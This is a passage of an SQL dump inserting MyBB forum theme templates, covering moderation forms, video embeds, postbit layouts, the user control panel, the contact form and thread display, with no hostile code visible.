class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$post[\'pid\']}\" id=\"inlinemod_{$post[\'pid\']}\" value=\"1\" style=\"vertical-align: middle;\" {$inlinecheck} /></td>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('576', 'search_results_posts_nocheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">&nbsp;</td>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('577', 'search_results_threads_inlinecheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$thread[\'tid\']}\" id=\"inlinemod_{$thread[\'tid\']}\" value=\"1\" style=\"vertical-align: middle;\" {$inlinecheck} /></td>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('578', 'search_results_threads_nocheck', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\">&nbsp;</td>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('579', 'search_results_inlinemodcol', '<td class=\"tcat\" align=\"center\" width=\"1\"><input type=\"checkbox\" name=\"allbox\" onclick=\"inlineModeration.checkAll(this)\" /></td>', '-2', '1408', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('580', 'search_results_posts_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customposttools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('581', 'search_results_posts_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('582', 'search_results_posts_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script> <form action=\"moderation.php\" method=\"post\" style=\"margin-top: 0; margin-bottom: 0;\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"tid\" value=\"0\" /> <input type=\"hidden\" name=\"searchid\" value=\"{$sid}\" /> <input type=\"hidden\" name=\"modtype\" value=\"inlinepost\" /> <span class=\"smalltext\"><strong>{$lang->inline_post_moderation}</strong></span> <select name=\"action\"> <optgroup label=\"{$lang->standard_mod_tools}\"> <option value=\"multideleteposts\">{$lang->inline_delete_posts}</option> <option value=\"multiapproveposts\">{$lang->inline_approve_posts}</option> <option value=\"multiunapproveposts\">{$lang->inline_unapprove_posts}</option> </optgroup> {$customposttools} </select> <input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->go} ({$inlinecount})\" id=\"inline_go\" />&nbsp; <input type=\"button\" class=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> <input type=\"hidden\" name=\"inlinetype\" value=\"search\" /> </form> <script type=\"text/javascript\"> <!-- var go_text = \"{$lang->inline_go}\"; var all_text = \"{$postcount}\"; var inlineType = \"search\"; var inlineId = \"{$sid}\"; // --> </script><br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('583', 'search_results_threads_inlinemoderation_custom', '<optgroup label=\"{$lang->custom_mod_tools}\">{$customthreadtools}</optgroup>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('584', 'search_results_threads_inlinemoderation_custom_tool', '<option value=\"{$tool[\'tid\']}\">{$tool[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('585', 'search_results_threads_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script> <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"fid\" value=\"0\" /> <input type=\"hidden\" name=\"searchid\" value=\"{$sid}\" /> <input type=\"hidden\" name=\"modtype\" value=\"inlinethread\" /> <span class=\"smalltext\"><strong>{$lang->inline_thread_moderation}</strong></span> <select name=\"action\"> <optgroup label=\"{$lang->standard_mod_tools}\"> <option value=\"multiclosethreads\">{$lang->close_threads}</option> <option value=\"multiopenthreads\">{$lang->open_threads}</option> <option value=\"multistickthreads\">{$lang->stick_threads}</option> <option value=\"multiunstickthreads\">{$lang->unstick_threads}</option> <option value=\"multideletethreads\">{$lang->delete_threads}</option> <option value=\"multimovethreads\">{$lang->move_threads}</option> <option value=\"multiapprovethreads\">{$lang->approve_threads}</option> <option value=\"multiunapprovethreads\">{$lang->unapprove_threads}</option> </optgroup> {$customthreadtools} </select> <input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->inline_go} ({$inlinecount})\" id=\"inline_go\" />&nbsp; <input type=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" class=\"button\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> <input type=\"hidden\" name=\"inlinetype\" value=\"search\" /> </form> <script type=\"text/javascript\"> <!-- var go_text = \"{$lang->inline_go}\"; var all_text = \"{$threadcount}\"; var inlineType = \"search\"; var inlineId = \'{$sid}\'; // --> </script> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('586', 'video_metacafe_embed', '<embed src=\"http://www.metacafe.com/fplayer/{$id}/{$title}.swf\" width=\"400\" height=\"345\" wmode=\"transparent\" allowFullScreen=\"true\" allowScriptAccess=\"always\" name=\"Metacafe_{$id}\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" type=\"application/x-shockwave-flash\"></embed>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('587', 'video_dailymotion_embed', '<div><object width=\"420\" height=\"339\"><param name=\"movie\" value=\"http://www.dailymotion.com/swf/{$id}\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowScriptAccess\" value=\"always\" /><embed src=\"http://www.dailymotion.com/swf/{$id}\" type=\"application/x-shockwave-flash\" width=\"420\" height=\"339\" allowFullScreen=\"true\" allowScriptAccess=\"always\"></embed></object></div>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('588', 'video_myspacetv_embed', '<object width=\"425px\" height=\"360px\"><param name=\"allowFullScreen\" value=\"true\"/><param name=\"wmode\" value=\"transparent\"/><param name=\"movie\" value=\"http://mediaservices.myspace.com/services/media/embed.aspx/m={$id},t=1,mt=video\"/><embed src=\"http://mediaservices.myspace.com/services/media/embed.aspx/m={$id},t=1,mt=video\" width=\"425\" height=\"360\" allowFullScreen=\"true\" type=\"application/x-shockwave-flash\" wmode=\"transparent\"></embed></object>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('589', 'video_youtube_embed', '<object type=\"application/x-shockwave-flash\" class=\"video_embed\" style=\"width: 450px; height: 366px;\" data=\"http://www.youtube.com/v/{$id}\"><param name=\"movie\" value=\"http://www.youtube.com/v/{$id}\" /></object>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('590', 'video_vimeo_embed', '<object width=\"400\" height=\"230\"><param name=\"allowfullscreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"movie\" value=\"http://vimeo.com/moogaloop.swf?clip_id={$id}&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1\" /><embed src=\"http://vimeo.com/moogaloop.swf?clip_id={$id}&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1\" type=\"application/x-shockwave-flash\" allowfullscreen=\"true\" allowscriptaccess=\"always\" width=\"400\" height=\"230\"></embed></object>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('591', 'video_yahoo_embed', '<div><object width=\"512\" height=\"322\"><param name=\"movie\" value=\"http://d.yimg.com/static.video.yahoo.com/yep/YV_YEP.swf?ver=2.2.40\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"AllowScriptAccess\" VALUE=\"always\" /><param name=\"bgcolor\" value=\"#000000\" /><param name=\"flashVars\" value=\"id={$id}&vid={$vid}&lang=en-us&intl=us&embed=1\" /><embed src=\"http://d.yimg.com/static.video.yahoo.com/yep/YV_YEP.swf?ver=2.2.40\" type=\"application/x-shockwave-flash\" width=\"512\" height=\"322\" allowFullScreen=\"true\" AllowScriptAccess=\"always\" bgcolor=\"#000000\" flashVars=\"id={$id}&vid={$vid}&lang=en-us&intl=us&embed=1\"></embed></object></div>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1882', 'footer', ' <br /> <div class=\"bottommenu\"> <div class=\"float_right\">{$lang_select}</div> <div> <span class=\"smalltext\"><a href=\"{$mybb->settings[\'contactlink\']}\">{$lang->bottomlinks_contactus}</a> | <a href=\"{$mybb->settings[\'homeurl\']}\">{$mybb->settings[\'homename\']}</a> | <a href=\"#top\">{$lang->bottomlinks_returntop}</a> | <a href=\"#content\">{$lang->bottomlinks_returncontent}</a> | <a href=\"<archive_url>\">{$lang->bottomlinks_litemode}</a> | <a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=syndication\">{$lang->bottomlinks_syndication}</a></span> </div> </div> </div> <hr class=\"hidden\" /> <div id=\"copyright\"> <div id=\"debug\"><debugstuff></div> <!-- MyBB is free software developed and maintained by a volunteer community. It would be much appreciated by the MyBB Group if you left the full copyright and \"powered by\" notice intact, to show your support for MyBB. If you choose to remove or modify the copyright below, you may be refused support on the MyBB Community Forums. This is free software, support us and we\'ll support you. --> {$lang->powered_by} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB{$mybbversion}</a>, &copy; 2002-{$copy_year} <a href=\"http://mybb.com/\" target=\"_blank\">MyBB Group</a>.<br /> <!-- End powered by --> <br /> <br class=\"clear\" /> <!-- The following piece of code allows MyBB to run scheduled tasks. DO NOT REMOVE -->{$task_image}<!-- End task image code --> {$auto_dst_detection} {$affiliates} </div> </div>', '1', '1608', '', '1339745376'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1990', 'stats', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->board_stats}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->board_stats}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->totals}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->averages}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\"> {$lang->posts} <strong>{$stats[\'numposts\']}</strong><br /> {$lang->threads} <strong>{$stats[\'numthreads\']}</strong><br /> {$lang->members} <strong>{$stats[\'numusers\']}</strong> </td> <td class=\"trow1\" rowspan=\"3\" valign=\"top\"> {$lang->ppd} <strong>{$postsperday}</strong><br /> {$lang->tpd} <strong>{$threadsperday}</strong><br /> {$lang->mpd} <strong>{$membersperday}</strong><br /> {$lang->ppm} <strong>{$postspermember}</strong><br /> {$lang->rpt} <strong>{$repliesperthread}</strong> </td> </tr> <tr> <td class=\"tcat\" valign=\"top\"><strong>{$lang->general}</strong></td> </tr> <tr> <td class=\"trow1\"> {$lang->newest_member} {$stats[\'newest_user\']}<br /> {$lang->members_posted} <strong>{$havepostedpercent}</strong><br /> {$lang->todays_top_poster}<br /> {$lang->popular_forum} </td> </tr> </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->most_popular}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"50%\"><strong>{$lang->most_replied_threads}</strong></td> <td class=\"tcat\" width=\"50%\"><strong>{$lang->most_viewed_threads}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\">{$mostreplies}</td> <td class=\"trow1\" valign=\"top\">{$mostviews}</td> </tr> </table> {$footer} </body> </html>', '8', '1608', '', '1343954655'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2010', 'usercp', '<html> <head> <title>{$lang->user_cp}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"{$colspan}\"><strong>{$lang->account_summary}</strong></td> </tr> <tr> {$avatar} <td class=\"trow2\"> <span class=\"largetext\">{$username}</span><br /> <strong>{$lang->postnum}</strong> <a href=\"search.php?action=finduser&amp;uid={$mybb->user[\'uid\']}\">{$mybb->user[\'posts\']}</a> {$lang->posts_day}<br /> {$reputation} <strong>{$lang->email}</strong> {$mybb->user[\'email\']}<br /> <strong>{$lang->registration_date}</strong> {$regdate}<br /> <strong>{$lang->primary_usergroup}</strong> {$usergroup}<br /> {$referral_info} </td> </tr> </table> {$latest_subscribed} {$latest_threads} {$latest_warnings} {$user_notepad} </td> </tr> </table> {$footer} </body> </html>', '8', '1608', '', '1345218535'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1867', 'postbit_classic', '{$ignore_bit} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}{$post[\'hellban_css\']}\" id=\"post_{$post[\'pid\']}\"> <tr> <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"><a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br /> <span class=\"smalltext\"> {$post[\'usertitle\']}<br /> {$post[\'userstars\']} {$post[\'groupimage\']} {$post[\'useravatar\']}<br /> {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements --> </span> </td> <td class=\"{$altbg}\" valign=\"top\"> <table width=\"100%\"> <tr><td>{$post[\'posturl\']}<span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span> <br /> <div id=\"pid_{$post[\'pid\']}\" class=\"post_body\"> {$post[\'message\']}{$post[\'hellban_message\']} </div> {$post[\'attachments\']} {$post[\'signature\']} <div style=\"text-align: right; vertical-align: bottom;\" id=\"post_meta_{$post[\'pid\']}\"> <div id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</div> {$post[\'iplogged\']} </div> </td></tr> </table> </td> </tr> <tr> <td class=\"{$altbg}\" style=\"white-space: nowrap; text-align: center; vertical-align: middle;\"><span class=\"smalltext\">{$post[\'postdate\']} {$post[\'posttime\']}</span></td> <td class=\"{$altbg}\" style=\"vertical-align: middle;\"> <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr valign=\"bottom\"> <td align=\"left\" ><span class=\"smalltext\">{$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}</span></td> <td align=\"right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}</td> </tr> </table> </td> </tr> </table>{$post[inline_ad]}', '1', '0', '', '1345218566'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1866', 'postbit', '{$ignore_bit} <a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}{$post[\'hellban_css\']}\" id=\"post_{$post[\'pid\']}\"> <tbody> <tr> <td class=\"tcat\"> <div class=\"float_left smalltext\"> {$post[\'postdate\']}, {$post[\'posttime\']} <span id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</span> </div> {$post[\'posturl\']} </td> </tr> <tr> <td class=\"trow1 {$unapproved_shade}\"> <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;\"> <tr> <td class=\"post_avatar\" width=\"1\" style=\"{$post[\'avatar_padding\']}\"> {$post[\'useravatar\']} </td> <td class=\"post_author\"> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br /> <span class=\"smalltext\"> {$post[\'usertitle\']}<br /> {$post[\'userstars\']} {$post[\'groupimage\']} </span> </td> <td class=\"smalltext post_author_info\" width=\"165\"> {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements --> </td> </tr> </table> </td> </tr> <tr> <td class=\"trow2 post_content {$unapproved_shade}\"> <span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span> <div class=\"post_body\" id=\"pid_{$post[\'pid\']}\"> {$post[\'message\']}{$post[\'hellban_message\']} </div> {$post[\'attachments\']} {$post[\'signature\']} <div class=\"post_meta\" id=\"post_meta_{$post[\'pid\']}\"> {$post[\'iplogged\']} </div> </td> </tr> <tr> <td class=\"trow1 post_buttons {$unapproved_shade}\"> <div class=\"author_buttons float_left\"> {$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']} </div> <div class=\"post_management_buttons float_right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']} </div> </td> </tr> </tbody> </table>{$post[inline_ad]}', '1', '0', '', '1345218566'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1864', 'usercp', '<html> <head> <title>{$lang->user_cp}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"{$colspan}\"><strong>{$lang->account_summary}</strong></td> </tr> <tr> {$avatar} <td class=\"trow2\"> <span class=\"largetext\">{$username}</span><br /> <strong>{$lang->postnum}</strong> <a href=\"search.php?action=finduser&amp;uid={$mybb->user[\'uid\']}\">{$mybb->user[\'posts\']}</a> {$lang->posts_day}<br /> {$reputation} <strong>{$lang->email}</strong> {$mybb->user[\'email\']}<br /> <strong>{$lang->registration_date}</strong> {$regdate}<br /> <strong>{$lang->primary_usergroup}</strong> {$usergroup}<br /> {$referral_info} </td> </tr> </table> {$latest_subscribed} {$latest_threads} {$latest_warnings} {$user_notepad} </td> </tr> </table> {$footer} </body> </html>', '1', '1608', '', '1339745373'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1860', 'forumdisplay_subforums', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\" align=\"center\"><strong>{$lang->sub_forums_in}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"2%\">&nbsp;</td><td class=\"tcat\" width=\"2%\">&nbsp;</td> <td class=\"tcat\" width=\"59%\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td> <td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td> <td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td> </tr> {$forums} </table> <br />', '1', '1608', '', '1339745353'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1859', 'forumbit_depth2_forum', '<tr> <td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" /></td><td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"uploads/ficons/{$forum[\'ficon\']}\" alt=\"{$forum[\'name\']}\" /></td> <td class=\"{$bgcolor}\" valign=\"top\"> <strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$modlist}{$subforums}</div> </td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td> <td class=\"{$bgcolor}\" valign=\"top\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td> </tr>', '1', '1608', '', '1339745353'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1858', 'contact', '<html> <head> <title>{$mybb->settings[bbname]} - {$lang->title}</title> {$headerinclude} </head> <body> {$header} {$show_errors} <table border=\"0\" cellspacing=\"{$theme[borderwidth]}\" cellpadding=\"{$theme[tablespace]}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$title}</strong></td> </tr> <tr> <td class=\"trow1\" align=\"center\"> <form action=\"contact.php\" method=\"post\" name=\"contact\" id=\"contact\"> <table border=\"0\" cellspacing=\"1\" width=\"75%\" cellpadding=\"4\"> <tr align=\"left\"> <td> <fieldset class=\"trow2\"> <legend><strong>{$lang->details}</strong></legend> <label for=\"name\">{$lang->name}</label><br /> <input class=\"text\" name=\"name\" type=\"text\" id=\"name\" value=\"{$mybb->user[username]}\" size=\"40\" /><br /><label for=\"emailaddress\">{$lang->email}</label><br /> <input class=\"text\" name=\"email\" type=\"text\" id=\"emailaddress\" value=\"{$mybb->user[email]}\" size=\"40\" /></fieldset> </td> </tr> <tr align=\"left\"> <td><fieldset class=\"trow2\"> <legend><strong>{$lang->subject}</strong></legend> <select name=\"subject\"> {$subjects} </select> <br /> </fieldset> </td> </tr> <tr align=\"left\"> <td> <fieldset class=\"trow2\"> <legend><strong>{$lang->message}</strong></legend> <textarea name=\"message\" cols=\"60\" rows=\"12\" id=\"message\">{$message}</textarea> </fieldset> {$regimage} </td> </tr> </table> <input class=\"button\" name=\"send\" type=\"submit\" id=\"send\" value=\"Send\" /> <input name=\"whosend\" type=\"hidden\" value=\"{$whosend}\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input name=\"action\" type=\"hidden\" value=\"do_send_contact\" /> </form> </td> </tr> </table> {$footer} </body> </html>', '-1', '1.0', '', '1148741710'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1856', 'showthread', '<html> <head> <title>{$thread[\'subject\']}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var quickdelete_confirm = \"{$lang->quickdelete_confirm}\"; // --> </script> <script type=\"text/javascript\" src=\"jscripts/thread.js?ver=1603\"></script> </head> <body> {$header} {$pollbox} <div class=\"float_left\"> {$multipage} </div> <div class=\"float_right\"> {$selfclose}{$newreply} </div> {$ratethread} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\"> <tr> <td class=\"thead\" colspan=\"2\"> <div style=\"float: right;\"> <span class=\"smalltext\"><strong><a href=\"showthread.php?mode=threaded&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->threaded}</a> | <a href=\"showthread.php?mode=linear&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->linear}</a></strong></span> </div> <div> <strong>{$thread[\'threadprefix\']}{$thread[\'subject\']}</strong> </div> </td> </tr> {$classic_header} </table> <div id=\"posts\"> {$posts} </div> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"border-top-width: 0;\"> <tr> <td colspan=\"2\" class=\"tfoot\"> {$search_thread} <div> <strong>&laquo; <a href=\"{$next_oldest_link}\">{$lang->next_oldest}</a> | <a href=\"{$next_newest_link}\">{$lang->next_newest}</a> &raquo;</strong> </div> </td> </tr> </table> <div class=\"float_left\"> {$multipage} </div> <div style=\"padding-top: 4px;\" class=\"float_right\"> {$selfclose}{$newreply} </div> <br style=\"clear: both;\" /> {$quickreply} {$threadexbox} {$similarthreads} <br /> <div class=\"float_left\"> <ul class=\"thread_tools\"> <li class=\"printable\"><a href=\"printthread.php?tid={$tid}\">{$lang->view_printable}</a></li> <li class=\"sendthread\"><a href=\"sendthread.php?tid={$tid}\">{$lang->send_thread}</a></li> <li class=\"subscription_{$add_remove_subscription}\"><a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;tid={$tid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a></li> </ul> </div> <div class=\"float_right\" style=\"text-align: right;\"> {$moderationoptions} {$forumjump} </div> <br style=\"clear: both;\" /> {$usersbrowsing} {$footer} </body> </html>', '1', '1608', '', '1339745345'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1854', 'self_close_button', ' <div style=\"float:left;\"> <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" /> <input type=\"hidden\" name=\"action\" value=\"selfclose\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"image\" src=\"{$theme[\'imgdir\']}/{$lang->language}/postbit_close.gif\" alt=\"{$lang->close}\" title=\"{$lang->close_thread}\" name=\"submit\" /> </form> </div>&nbsp;', '-1', '1', '', '1339745345'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1855', 'self_open_button', ' <div style=\"float:left;\"> <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" /> <input type=\"hidden\" name=\"action\" value=\"selfopen\" /> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"image\" src=\"{$theme[\'imgdir\']}/{$lang->language}/postbit_open.gif\" alt=\"{$lang->open}\" title=\"{$lang->open_thread}\" name=\"submit\" /> </form> </div>&nbsp;', '-1', '1', '', '1339745345'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1852', 'headerinclude', '{$metadescription} {$metakeywords} <link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->latest_threads} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php\" /> <link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->latest_threads} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0\" /> <meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" /> <meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" /> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/prototype.js?ver=1603\"></script> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/general.js?ver=1603\"></script> <script type=\"text/javascript\" 